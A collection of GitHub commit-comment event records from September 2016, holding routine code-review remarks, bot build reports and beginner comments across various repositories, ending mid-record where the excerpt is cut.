{"id":"4591972590","type":"CommitCommentEvent","actor":{"login":"StasKolodyuk"},"repo":{"name":"z143/ProjectStas"},"payload":{"comment":{"id":19102697,"position":10,"line":10,"path":"Project1/logback-test.xml","commit_id":"4a47d0c32c74821b24bafe6b47bf0c933b248ba5","created_at":"2016-09-20T19:38:00Z","updated_at":"2016-09-20T19:38:00Z","body":"Эту строчку надо удалить. Этой строкой ты говоришь, что логирование в пакете `com.lordofthejars.foo` будет на уровне `INFO`. Ну а у тебя такого пакета нет даже :)"}},"created_at":"2016-09-20T19:38:00Z"}
{"id":"4591973043","type":"CommitCommentEvent","actor":{"login":"SillyInventor"},"repo":{"name":"CSnap/rpi_csdt_community"},"payload":{"comment":{"id":19102698,"position":null,"line":null,"path":null,"commit_id":"a4187d855031bb73b4aff012e92b02bf21602d88","created_at":"2016-09-20T19:38:03Z","updated_at":"2016-09-20T19:38:03Z","body":"No, this is not where you do this. It must be on the SERVER in the file named local settings. Doing this here breaks everyone else's copy, and still won't change the server. "}},"created_at":"2016-09-20T19:38:03Z"}
{"id":"4591973567","type":"CommitCommentEvent","actor":{"login":"thatbandgeek"},"repo":{"name":"thatbandgeek/Hello-World"},"payload":{"comment":{"id":19102701,"position":null,"line":null,"path":null,"commit_id":"dbd307d9830b3e935712b719edb9cd8bc7fc571f","created_at":"2016-09-20T19:38:09Z","updated_at":"2016-09-20T19:38:09Z","body":"Bands are amazing "}},"created_at":"2016-09-20T19:38:09Z"}
{"id":"4591973615","type":"CommitCommentEvent","actor":{"login":"Coop52"},"repo":{"name":"Coop52/HelloWorld"},"payload":{"comment":{"id":19102702,"position":null,"line":null,"path":null,"commit_id":"e58e431d6dcfad7a6a0ab5e864337d6bcbf0ddd8","created_at":"2016-09-20T19:38:09Z","updated_at":"2016-09-20T19:38:09Z","body":"hi"}},"created_at":"2016-09-20T19:38:09Z"}
{"id":"4591973751","type":"CommitCommentEvent","actor":{"login":"SilentGamer02"},"repo":{"name":"SilentGamer02/HelloWorld"},"payload":{"comment":{"id":19102703,"position":null,"line":null,"path":null,"commit_id":"52d76ceaee432a06e1ca10e408d932ff54f9bf32","created_at":"2016-09-20T19:38:11Z","updated_at":"2016-09-20T19:38:11Z","body":"Correction: I bought a pi yesterday and am buying a pie today."}},"created_at":"2016-09-20T19:38:11Z"}
{"id":"4591974488","type":"CommitCommentEvent","actor":{"login":"Nerdycat1"},"repo":{"name":"Nerdycat1/Hello-World"},"payload":{"comment":{"id":19102704,"position":null,"line":null,"path":null,"commit_id":"a576ca30fe99353e842647d96f188a8a82b00e61","created_at":"2016-09-20T19:38:18Z","updated_at":"2016-09-20T19:38:18Z","body":"I think over time I will get better, but as of right now, I'm a beginner. Please be nice with me. (v_v)"}},"created_at":"2016-09-20T19:38:18Z"}
{"id":"4591975161","type":"CommitCommentEvent","actor":{"login":"monsonas"},"repo":{"name":"monsonas/Hello-World"},"payload":{"comment":{"id":19102705,"position":null,"line":null,"path":null,"commit_id":"766a00e3969b6789c611d0f416985a9e1fc4c2db","created_at":"2016-09-20T19:38:25Z","updated_at":"2016-09-20T19:38:25Z","body":"smashing on keyboard is nothing you scrub."}},"created_at":"2016-09-20T19:38:25Z"}
{"id":"4591976254","type":"CommitCommentEvent","actor":{"login":"Fire399"},"repo":{"name":"Fire399/Hello-World"},"payload":{"comment":{"id":19102706,"position":null,"line":null,"path":null,"commit_id":"2c5ab5a3906c50f27ec67a38ac5ee5a39ce76016","created_at":"2016-09-20T19:38:33Z","updated_at":"2016-09-20T19:38:33Z","body":"That was a great git!"}},"created_at":"2016-09-20T19:38:33Z"}
{"id":"4591976987","type":"CommitCommentEvent","actor":{"login":"albertoleal"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":19102707,"position":26,"line":168,"path":"image_puller/unpacker/namespaced_cmd_linux.go","commit_id":"29c04d6ac0472daab9916223e7d14ded8c8d712f","created_at":"2016-09-20T19:38:40Z","updated_at":"2016-09-20T19:38:40Z","body":"@glestaris I thought that it was a non-blocking operation, but I've just confirmed and `chug.Chug` is blocking.\r\n\r\n1000 seems to be a big value, but since we're streaming logs I'm worried about streaming them outside a goroutine. We may end up with a deadlock if `stream` is bigger than 1000 - because `chug.Chug` is blocking. \r\n\r\n```go\r\npackage main\r\n\r\nimport (\r\n\t\"bytes\"\r\n\t\"fmt\"\r\n\r\n\t\"code.cloudfoundry.org/lager/chug\"\r\n)\r\n\r\nfunc main() {\r\n\r\n\tbuffer := bytes.NewBuffer([]byte{})\r\n\tbuffer.WriteString(\"this is the first entry\\n\")\r\n\tbuffer.WriteString(\"this is the second entry\")\r\n\r\n\tentries := make(chan chug.Entry, 1)\r\n\tchug.Chug(buffer, entries)\r\n\r\n\tfor entry := range entries {\r\n\t\tfmt.Printf(\"entry = %+v\\n\", string(entry.Raw))\r\n\t}\r\n\tfmt.Println(\"done!\")\r\n}\r\n```\r\n```bash\r\n# fatal error: all goroutines are asleep - deadlock!\r\n```"}},"created_at":"2016-09-20T19:38:40Z"}
{"id":"4591977200","type":"CommitCommentEvent","actor":{"login":"sethisawesome"},"repo":{"name":"sethisawesome/hello-world"},"payload":{"comment":{"id":19102708,"position":null,"line":null,"path":null,"commit_id":"e1a7c4cee2621596e44d1d570999f1645d3f083c","created_at":"2016-09-20T19:38:42Z","updated_at":"2016-09-20T19:38:42Z","body":"wow this guys is such a noob\r\nthat seth guys sounds prety cool though"}},"created_at":"2016-09-20T19:38:42Z"}
{"id":"4591978630","type":"CommitCommentEvent","actor":{"login":"izzymendez"},"repo":{"name":"izzymendez/Hello-Worlds"},"payload":{"comment":{"id":19102712,"position":null,"line":null,"path":null,"commit_id":"134a0a3d96ae03905913c690352a10594dd7a43e","created_at":"2016-09-20T19:38:55Z","updated_at":"2016-09-20T19:38:55Z","body":"Glad that you love it. You're awesome. Fix your punctuation. Also, add capitalize your words."}},"created_at":"2016-09-20T19:38:55Z"}
{"id":"4591978922","type":"CommitCommentEvent","actor":{"login":"danieltlrlm"},"repo":{"name":"danieltlrlm/merchant-api-ruby"},"payload":{"comment":{"id":19102713,"position":null,"line":null,"path":null,"commit_id":"66b397e501f7f9752a72f4cfcc7e4ae0711305ba","created_at":"2016-09-20T19:38:59Z","updated_at":"2016-09-20T19:38:59Z","body":"__apiary.manifest contains reference to non-existent file in repository.__ (Autogenerated message from apiary.io)\n+ apiary.apib"}},"created_at":"2016-09-20T19:38:59Z"}
{"id":"4591979436","type":"CommitCommentEvent","actor":{"login":"StasKolodyuk"},"repo":{"name":"z143/ProjectStas"},"payload":{"comment":{"id":19102715,"position":34,"line":34,"path":"Project1/pom.xml","commit_id":"4a47d0c32c74821b24bafe6b47bf0c933b248ba5","created_at":"2016-09-20T19:39:04Z","updated_at":"2016-09-20T19:39:04Z","body":"версию вынеси в пропертю как ты сделал для `${slf4j.version} и ${logback.version}`"}},"created_at":"2016-09-20T19:39:04Z"}
{"id":"4591980647","type":"CommitCommentEvent","actor":{"login":"tahoang"},"repo":{"name":"esrgc/whatsUp"},"payload":{"comment":{"id":19102718,"position":46,"line":26,"path":"views/profile/index.html","commit_id":"b87b1ad8d597b8356edbb1753691d19cf48e7423","created_at":"2016-09-20T19:39:16Z","updated_at":"2016-09-20T19:39:16Z","body":"@johntalbot1215 this panel was outside \"col-md-12\""}},"created_at":"2016-09-20T19:39:16Z"}
{"id":"4591981872","type":"CommitCommentEvent","actor":{"login":"palinek"},"repo":{"name":"pvanek/qlipper"},"payload":{"comment":{"id":19102726,"position":null,"line":null,"path":null,"commit_id":"0862db2ecd029cf3482d05f66efab311b3f3725b","created_at":"2016-09-20T19:39:28Z","updated_at":"2016-09-20T19:39:28Z","body":">  I've tried it in the past but there were problems with the apt addons.\r\n\r\nYes, the default VM for the builds is realy outdated (ubuntu 12.04 :) ).... I've just googled around and tried-failed-..."}},"created_at":"2016-09-20T19:39:28Z"}
{"id":"4591982753","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"shane-tomlinson/glob-require"},"payload":{"comment":{"id":19102728,"position":null,"line":null,"path":null,"commit_id":"f1cbeea21fb3361f68eaedb827e6e7cda1fc616c","created_at":"2016-09-20T19:39:37Z","updated_at":"2016-09-20T19:39:37Z","body":":+1:"}},"created_at":"2016-09-20T19:39:37Z"}
{"id":"4591988382","type":"CommitCommentEvent","actor":{"login":"davebotelho"},"repo":{"name":"openshift/openshift-ansible"},"payload":{"comment":{"id":19102738,"position":null,"line":null,"path":null,"commit_id":"be8ada8017881f349a68759d95cf31c28ebed86d","created_at":"2016-09-20T19:40:27Z","updated_at":"2016-09-20T19:40:27Z","body":"Thanks man, that worked for me.\r\n\r\nFrom: Scott Dodson [mailto:notifications@github.com]\r\nSent: Tuesday, September 20, 2016 3:03 PM\r\nTo: openshift/openshift-ansible\r\nCc: Botelho, David; Comment\r\nSubject: Re: [openshift/openshift-ansible] Add portal_net and sdn_cluster_network_cidr to node NO_PROXY (be8ada8)\r\n\r\n\r\nShould be fixed on master via #2474<https://github.com/openshift/openshift-ansible/pull/2474>\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/openshift/openshift-ansible/commit/be8ada8017881f349a68759d95cf31c28ebed86d#commitcomment-19102115>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AE4nf3imBJ8CeDu_eJpBJ4EjMAps7Wdyks5qsC3KgaJpZM4KB9zD>.\r\n"}},"created_at":"2016-09-20T19:40:27Z"}
{"id":"4591988810","type":"CommitCommentEvent","actor":{"login":"mewmew"},"repo":{"name":"llir/llvm"},"payload":{"comment":{"id":19102741,"position":null,"line":null,"path":null,"commit_id":"b0e89e39f7c141218e388ac302d040b0dc727ca1","created_at":"2016-09-20T19:40:31Z","updated_at":"2016-09-20T19:40:31Z","body":":+1:, much cleaner."}},"created_at":"2016-09-20T19:40:31Z"}
{"id":"4591990089","type":"CommitCommentEvent","actor":{"login":"IIvec"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19102747,"position":null,"line":null,"path":null,"commit_id":"21c5a51947a35cdba9bece35093b7dc32f621d1c","created_at":"2016-09-20T19:40:43Z","updated_at":"2016-09-20T19:40:43Z","body":"A good idea here will work much better than tuning. Let's wish that it will happen."}},"created_at":"2016-09-20T19:40:43Z"}
{"id":"4591990334","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19102748,"position":null,"line":null,"path":null,"commit_id":"ee5f2d18ffd0807abd15b7f27b43f7bd2050c600","created_at":"2016-09-20T19:40:45Z","updated_at":"2016-09-20T19:40:45Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-MacOS-10.9-clang: OK (2330 of 2333 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T19:40:45Z"}
{"id":"4591991681","type":"CommitCommentEvent","actor":{"login":"StasKolodyuk"},"repo":{"name":"z143/ProjectStas"},"payload":{"comment":{"id":19102750,"position":52,"line":52,"path":"Project1/src/main/java/JsonObject.java","commit_id":"4a47d0c32c74821b24bafe6b47bf0c933b248ba5","created_at":"2016-09-20T19:40:57Z","updated_at":"2016-09-20T19:40:57Z","body":"Тут лучше всего переопределить метод `toString()`, чтоб потом не пилить отдельный класс типа твоего `LogObject`"}},"created_at":"2016-09-20T19:40:57Z"}
{"id":"4591993846","type":"CommitCommentEvent","actor":{"login":"kvanrobbroeck"},"repo":{"name":"dmatterne/GameBacklog"},"payload":{"comment":{"id":19102760,"position":null,"line":null,"path":null,"commit_id":"ebf0c50f49a0a7824377fd44c89f9d5d4ca4c269","created_at":"2016-09-20T19:41:16Z","updated_at":"2016-09-20T19:41:16Z","body":"It's an interesting thing to learn about persistence converters, such as with https://github.com/dmatterne/GameBacklog/blob/ebf0c50f49a0a7824377fd44c89f9d5d4ca4c269/src/main/java/be/david/domain/LocalDateConverter.java\r\n\r\nHowever, you may find it interesting that - since we're using Spring and not JEE7 - you can use Hibernate 5, which already includes support for Java 8 date/time types out of the box! Check out this issue for more info about it: https://hibernate.atlassian.net/browse/HHH-8844."}},"created_at":"2016-09-20T19:41:16Z"}
{"id":"4591995142","type":"CommitCommentEvent","actor":{"login":"StasKolodyuk"},"repo":{"name":"z143/ProjectStas"},"payload":{"comment":{"id":19102764,"position":1,"line":1,"path":"Project1/src/main/java/LogObject.java","commit_id":"4a47d0c32c74821b24bafe6b47bf0c933b248ba5","created_at":"2016-09-20T19:41:28Z","updated_at":"2016-09-20T19:41:28Z","body":"Этот класс не нужен, если переопределить `toString()`"}},"created_at":"2016-09-20T19:41:28Z"}
{"id":"4591996934","type":"CommitCommentEvent","actor":{"login":"frol"},"repo":{"name":"gliderlabs/docker-alpine"},"payload":{"comment":{"id":19102769,"position":null,"line":null,"path":null,"commit_id":"a32a44b699ac5b973360d65141b84550d58eb14c","created_at":"2016-09-20T19:41:45Z","updated_at":"2016-09-20T19:41:45Z","body":"Could you, please, also update the official Alpine images? https://hub.docker.com/r/library/alpine/tags/3.4/ (They are pushed 20 hours ago, but openssl issues are still reported)"}},"created_at":"2016-09-20T19:41:45Z"}
{"id":"4592005754","type":"CommitCommentEvent","actor":{"login":"ARHANGEL1994"},"repo":{"name":"ARHANGEL1994/Lab1"},"payload":{"comment":{"id":19102786,"position":1,"line":1,"path":"README.md","commit_id":"68804fb4327c1aabead457e8878df5d81971405f","created_at":"2016-09-20T19:43:07Z","updated_at":"2016-09-20T19:43:07Z","body":"Первый репозиторий\r\n"}},"created_at":"2016-09-20T19:43:07Z"}
{"id":"4592008460","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19102797,"position":null,"line":null,"path":null,"commit_id":"30ab020f51cc5df326cccab87fcbb36ef89a91d7","created_at":"2016-09-20T19:43:31Z","updated_at":"2016-09-20T19:43:31Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/506/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=WW-318)."}},"created_at":"2016-09-20T19:43:31Z"}
{"id":"4592010005","type":"CommitCommentEvent","actor":{"login":"salty-horse"},"repo":{"name":"salty-horse/ibus-uniemoji"},"payload":{"comment":{"id":19102800,"position":null,"line":null,"path":null,"commit_id":"65ff978f47985c667eef2753a006eb827ea586bc","created_at":"2016-09-20T19:43:45Z","updated_at":"2016-09-20T19:43:45Z","body":"That's possible, but I'd like to get some testing on using the variables.\r\nDid you get a chance to test these new changes? Are they working fine for your package system?"}},"created_at":"2016-09-20T19:43:45Z"}
{"id":"4592012968","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19102804,"position":null,"line":null,"path":null,"commit_id":"7c5b076e2a10919f8807f069be347e4991d7c98d","created_at":"2016-09-20T19:44:11Z","updated_at":"2016-09-20T19:44:11Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#RCnYNzxwQXyNZuYRaYOBGg"}},"created_at":"2016-09-20T19:44:11Z"}
{"id":"4592018815","type":"CommitCommentEvent","actor":{"login":"chittattoo"},"repo":{"name":"gunyarakun/Framework7"},"payload":{"comment":{"id":19102816,"position":5,"line":102,"path":"src/js/views.js","commit_id":"cad37237e6eabd55a7ae31f69f62207f6993d48c","created_at":"2016-09-20T19:45:04Z","updated_at":"2016-09-20T19:45:04Z","body":"Gggg"}},"created_at":"2016-09-20T19:45:04Z"}
{"id":"4592020510","type":"CommitCommentEvent","actor":{"login":"bbodenmiller"},"repo":{"name":"rnpm/rnpm"},"payload":{"comment":{"id":19102818,"position":null,"line":null,"path":null,"commit_id":"1db2a06850f8f727b5c68ab0f3450f140c24ac91","created_at":"2016-09-20T19:45:19Z","updated_at":"2016-09-20T19:45:19Z","body":"@Kureev & @grabbou, how does one actually use this from React Native? For example, https://github.com/react-native-community/react-native-elements#step-1 is still calling out installing rnpm."}},"created_at":"2016-09-20T19:45:19Z"}
{"id":"4592021145","type":"CommitCommentEvent","actor":{"login":"StasKolodyuk"},"repo":{"name":"z143/ProjectStas"},"payload":{"comment":{"id":19102820,"position":18,"line":18,"path":"Project1/src/main/java/Test1.java","commit_id":"4a47d0c32c74821b24bafe6b47bf0c933b248ba5","created_at":"2016-09-20T19:45:25Z","updated_at":"2016-09-20T19:45:25Z","body":"Тут я хотел, чтоб после того как ты прочитал в obj, ты его залогировал.\r\nТ.е. сделал как-то так: `logger.debug(\"Object: {}\", obj);`."}},"created_at":"2016-09-20T19:45:25Z"}
{"id":"4592022811","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"jekyll/jekyll"},"payload":{"comment":{"id":19102823,"position":null,"line":null,"path":null,"commit_id":"748b2f1279494f1eb43eeb4ce0b441546465b701","created_at":"2016-09-20T19:45:41Z","updated_at":"2016-09-20T19:45:41Z","body":"This change should be submitted upstream and also add a comment that's it's a custom change."}},"created_at":"2016-09-20T19:45:41Z"}
{"id":"4592023119","type":"CommitCommentEvent","actor":{"login":"sxleal"},"repo":{"name":"gabihardy/BookClubApp"},"payload":{"comment":{"id":19102824,"position":null,"line":null,"path":null,"commit_id":"5cd3a2c4cb0c1b9e74a3c8f5242b822d1f72b05e","created_at":"2016-09-20T19:45:44Z","updated_at":"2016-09-20T19:45:44Z","body":"Hi team, here is an updated html template.  i've been adding 'holder' spots where i expect we will be writing code to dynamically update.  this is to get a visual of the layout as well as to show you where 'waiting' spots are in the html.  i've also gone through and tried to clean up and annotate the code so we can find our way around.  Still have work to do :0"}},"created_at":"2016-09-20T19:45:44Z"}
{"id":"4592024796","type":"CommitCommentEvent","actor":{"login":"Ravenstine"},"repo":{"name":"SCPR/scpr-style-guide"},"payload":{"comment":{"id":19102826,"position":null,"line":null,"path":null,"commit_id":"3fa66614b14976d91ac18dbd83096047e2c9cb04","created_at":"2016-09-20T19:46:00Z","updated_at":"2016-09-20T19:46:00Z","body":"Yeah, the variables and the mixins weren't intended to be in the final version; just holdovers that made development simpler, but will be removed.  \r\n\r\nI like the idea of the prefix.  Should this prefix also be applied to the grid container?  It does not appear to have a prefix in `_containers.css.scss`.  Just curious if there's a reason for that.  Yes, essentially the \".grid\" element gets replaced by containers.\r\n\r\nI'll work on changing around the units.  \r\n\r\nAlso, I have an idea for changing around some of the terminology.  Right now, this grid and other flexbox grids like it treat the elements in the same way bootstrap does by creating \"rows\" and the children of those rows are \"columns\".  But with Flexbox, there are both rows and *true* columns, and the children of a row or column are called \"items\".\r\nhttp://www.sketchingwithcss.com/samplechapter/cheatsheet.html#column\r\n\r\nDo you think that this terminology should be reflected in our grid system?  The argument I can see for doing this would be if we wanted to ever use flex columns.  If we don't, then it might not be necessary."}},"created_at":"2016-09-20T19:46:00Z"}
{"id":"4592026620","type":"CommitCommentEvent","actor":{"login":"tahoang"},"repo":{"name":"esrgc/whatsUp"},"payload":{"comment":{"id":19102828,"position":null,"line":null,"path":null,"commit_id":"3c0650445900f05553b1e7bfab8ef88510c6aa38","created_at":"2016-09-20T19:46:17Z","updated_at":"2016-09-20T19:46:17Z","body":"@johntalbot1215 I'll add your name to the description so you'll get notified when new commits are available\r\n"}},"created_at":"2016-09-20T19:46:17Z"}
{"id":"4592026823","type":"CommitCommentEvent","actor":{"login":"chittattoo"},"repo":{"name":"gunyarakun/Framework7"},"payload":{"comment":{"id":19102829,"position":6,"line":103,"path":"src/js/views.js","commit_id":"cad37237e6eabd55a7ae31f69f62207f6993d48c","created_at":"2016-09-20T19:46:19Z","updated_at":"2016-09-20T19:46:19Z","body":"pushStateRoot"}},"created_at":"2016-09-20T19:46:19Z"}
{"id":"4592028148","type":"CommitCommentEvent","actor":{"login":"QifengXu"},"repo":{"name":"QifengXu/601HW1"},"payload":{"comment":{"id":19102833,"position":null,"line":null,"path":null,"commit_id":"0048a447b1f6e6122f98590b6698cd5d06a122cb","created_at":"2016-09-20T19:46:32Z","updated_at":"2016-09-20T19:46:32Z","body":"original one"}},"created_at":"2016-09-20T19:46:32Z"}
{"id":"4592029607","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"dmulloy2/ChestShop-3"},"payload":{"comment":{"id":19102835,"position":null,"line":null,"path":null,"commit_id":"8c7594be51bc6053a30a111e8ac3c15acd280bce","created_at":"2016-09-20T19:46:47Z","updated_at":"2016-09-20T19:46:47Z","body":"For what it's worth, I had a user change his name recently and when he tried to create new shops, it did so under his old name. Even if he manually typed his current name on the line instead of letting it fill automatically, it updated to the old one. So definitely some funky user UUID mapping going on?"}},"created_at":"2016-09-20T19:46:47Z"}
{"id":"4592037337","type":"CommitCommentEvent","actor":{"login":"dmulloy2"},"repo":{"name":"dmulloy2/ChestShop-3"},"payload":{"comment":{"id":19102850,"position":null,"line":null,"path":null,"commit_id":"8c7594be51bc6053a30a111e8ac3c15acd280bce","created_at":"2016-09-20T19:47:56Z","updated_at":"2016-09-20T19:47:56Z","body":"Yeah I'm not terribly familiar with how UUIDs work with ChestShop, but there's definitely something wrong with how it handles name changes."}},"created_at":"2016-09-20T19:47:56Z"}
{"id":"4592037585","type":"CommitCommentEvent","actor":{"login":"dothework"},"repo":{"name":"3x7r3m157/bloccit"},"payload":{"comment":{"id":19102851,"position":null,"line":null,"path":null,"commit_id":"708028e3d22b7ebafe705dc80ece1e746eab2726","created_at":"2016-09-20T19:47:59Z","updated_at":"2016-09-20T19:47:59Z","body":"I meant to ask.... what's the story behind your github username? "}},"created_at":"2016-09-20T19:47:59Z"}
{"id":"4592042732","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"mdlugosz1/kodilla-projekt"},"payload":{"comment":{"id":19102856,"position":21,"line":21,"path":"gruntfile.js","commit_id":"a2c2eda48fc95c77c767e62e041cc161631278b5","created_at":"2016-09-20T19:48:48Z","updated_at":"2016-09-20T19:48:48Z","body":"Odpal ten task kilka razy ;)\r\n\r\nUsuń dwie gwiazdki z początku, bo one sprawiają, że szuka plików w dowolnym podfolderze."}},"created_at":"2016-09-20T19:48:48Z"}
{"id":"4592055534","type":"CommitCommentEvent","actor":{"login":"sdillingham"},"repo":{"name":"SCPR/scpr-style-guide"},"payload":{"comment":{"id":19102897,"position":null,"line":null,"path":null,"commit_id":"3fa66614b14976d91ac18dbd83096047e2c9cb04","created_at":"2016-09-20T19:50:54Z","updated_at":"2016-09-20T19:50:54Z","body":"The docs-site-mvp branch has a bunch refactoring work and I may have added\nthe prefix in there. I would recommend merging that branch into yours\nbefore you do any more work.\nOn Tue, Sep 20, 2016 at 12:46 PM Ravenstine <notifications@github.com>\nwrote:\n\n> Yeah, the variables and the mixins weren't intended to be in the final\n> version; just holdovers that made development simpler, but will be removed.\n>\n> I like the idea of the prefix. Should this prefix also be applied to the\n> grid container? It does not appear to have a prefix in\n> _containers.css.scss. Just curious if there's a reason for that. Yes,\n> essentially the \".grid\" element gets replaced by containers.\n>\n> I'll work on changing around the units.\n>\n> Also, I have an idea for changing around some of the terminology. Right\n> now, this grid and other flexbox grids like it treat the elements in the\n> same way bootstrap does by creating \"rows\" and the children of those rows\n> are \"columns\". But with Flexbox, there are both rows and *true* columns,\n> and the children of a row or column are called \"items\".\n> http://www.sketchingwithcss.com/samplechapter/cheatsheet.html#column\n>\n> Do you think that this terminology should be reflected in our grid system?\n> The argument I can see for doing this would be if we wanted to ever use\n> flex columns. If we don't, then it might not be necessary.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/SCPR/scpr-style-guide/commit/3fa66614b14976d91ac18dbd83096047e2c9cb04#commitcomment-19102826>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAbAc6ZYReVfGOrSVWLOKkt0QQ01-Mdlks5qsDf5gaJpZM4KB9FW>\n> .\n>\n"}},"created_at":"2016-09-20T19:50:54Z"}
{"id":"4592056122","type":"CommitCommentEvent","actor":{"login":"mpkh"},"repo":{"name":"Heather/gentoo-gnome"},"payload":{"comment":{"id":19102902,"position":null,"line":null,"path":null,"commit_id":"fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5","created_at":"2016-09-20T19:51:00Z","updated_at":"2016-09-20T19:51:00Z","body":"@thankjura давно, в Readme есть репозитория - второй пункт, можно добавить хак в сам ебилд"}},"created_at":"2016-09-20T19:51:00Z"}
{"id":"4592059191","type":"CommitCommentEvent","actor":{"login":"lornat75"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19102910,"position":null,"line":null,"path":null,"commit_id":"3b0616ca6b81591c5414bfeda7c43d3adc92ed5d","created_at":"2016-09-20T19:51:30Z","updated_at":"2016-09-20T19:51:30Z","body":"...do you realize this commit is from 2011? 😄 "}},"created_at":"2016-09-20T19:51:30Z"}
{"id":"4592059333","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"pedroamarques/EDL"},"payload":{"comment":{"id":19102912,"position":null,"line":null,"path":null,"commit_id":"04331f8751a018e2cd317c48a9f8efe529ee46dc","created_at":"2016-09-20T19:51:32Z","updated_at":"2016-09-20T19:51:32Z","body":"ok. arredondei pra cima."}},"created_at":"2016-09-20T19:51:32Z"}
{"id":"4592060300","type":"CommitCommentEvent","actor":{"login":"chamath"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19102914,"position":null,"line":null,"path":null,"commit_id":"23103c03c527fe1ed3e1a3be691436818b7963fe","created_at":"2016-09-20T19:51:43Z","updated_at":"2016-09-20T19:51:43Z","body":"Thanks @flnative  and @romeof1980. I will try those. But thing is we need do same thing when we do deploy"}},"created_at":"2016-09-20T19:51:43Z"}
{"id":"4592061315","type":"CommitCommentEvent","actor":{"login":"mganjoo"},"repo":{"name":"epeli/slimux"},"payload":{"comment":{"id":19102917,"position":5,"line":6,"path":"plugin/slimux.vim","commit_id":"55a01a2f87dbec6db18f5199cdf5493aba5dca59","created_at":"2016-09-20T19:51:54Z","updated_at":"2016-09-20T19:51:54Z","body":"This causes the plugin to break on OS X if `g:slimux_tmux_path` is not set, because of the extraneous newline in a `system()` call response. Replacing with a newline-chomped version:\r\n```\r\n   let g:slimux_tmux_path = substitute(system('command -v tmux'), '\\n\\+$', '', '')\r\n```\r\nfixes this."}},"created_at":"2016-09-20T19:51:54Z"}
{"id":"4592062362","type":"CommitCommentEvent","actor":{"login":"dothework"},"repo":{"name":"sdssix/address-bloc"},"payload":{"comment":{"id":19102919,"position":null,"line":null,"path":null,"commit_id":"bfdeca5469dd23a2782af233c90c05d3d6c8587b","created_at":"2016-09-20T19:52:08Z","updated_at":"2016-09-20T19:52:08Z","body":"@sdssix I don't 'see' where the missing end is. Use this technique to find it. Comment out 1/2 the code and rerun it. If the error is gone, you now what half contains it. Slice the offending half in half, and repeat. Keep slicing things in half and you'll quickly find it."}},"created_at":"2016-09-20T19:52:08Z"}
{"id":"4592064402","type":"CommitCommentEvent","actor":{"login":"pasildan"},"repo":{"name":"Wargus/wargus"},"payload":{"comment":{"id":19102924,"position":null,"line":null,"path":null,"commit_id":"ecbd913864cd4c4fd23810c274a68dd76bff4017","created_at":"2016-09-20T19:52:30Z","updated_at":"2016-09-20T19:52:30Z","body":"thank you pal :)"}},"created_at":"2016-09-20T19:52:30Z"}
{"id":"4592066241","type":"CommitCommentEvent","actor":{"login":"dan-mannion"},"repo":{"name":"dan-mannion/y4proj"},"payload":{"comment":{"id":19102927,"position":null,"line":null,"path":null,"commit_id":"77600b48882d3643284a83a3b4a85974fae75d3e","created_at":"2016-09-20T19:52:48Z","updated_at":"2016-09-20T19:52:48Z","body":"OH MA GOD WE'RE BUILDING A BRAIN\r\n\r\n![alt text](https://s3.amazonaws.com/lowres.cartoonstock.com/social-issues-computer_chip-government_interference-governments-brain_controls-implants-rman14937_low.jpg \"Brainnnn\")\r\n"}},"created_at":"2016-09-20T19:52:48Z"}
{"id":"4592070201","type":"CommitCommentEvent","actor":{"login":"sdillingham"},"repo":{"name":"SCPR/scpr-style-guide"},"payload":{"comment":{"id":19102934,"position":null,"line":null,"path":null,"commit_id":"3fa66614b14976d91ac18dbd83096047e2c9cb04","created_at":"2016-09-20T19:53:31Z","updated_at":"2016-09-20T19:53:31Z","body":"Also, I'm on the fence about the naming conventions for columns and rows. I\nsee your point, but there's a lot of momentum behind the whole \".row >\n.col-x\" convention.\n\nOn Tue, Sep 20, 2016 at 12:46 PM Ravenstine <notifications@github.com>\nwrote:\n\n> Yeah, the variables and the mixins weren't intended to be in the final\n> version; just holdovers that made development simpler, but will be removed.\n>\n> I like the idea of the prefix. Should this prefix also be applied to the\n> grid container? It does not appear to have a prefix in\n> _containers.css.scss. Just curious if there's a reason for that. Yes,\n> essentially the \".grid\" element gets replaced by containers.\n>\n> I'll work on changing around the units.\n>\n> Also, I have an idea for changing around some of the terminology. Right\n> now, this grid and other flexbox grids like it treat the elements in the\n> same way bootstrap does by creating \"rows\" and the children of those rows\n> are \"columns\". But with 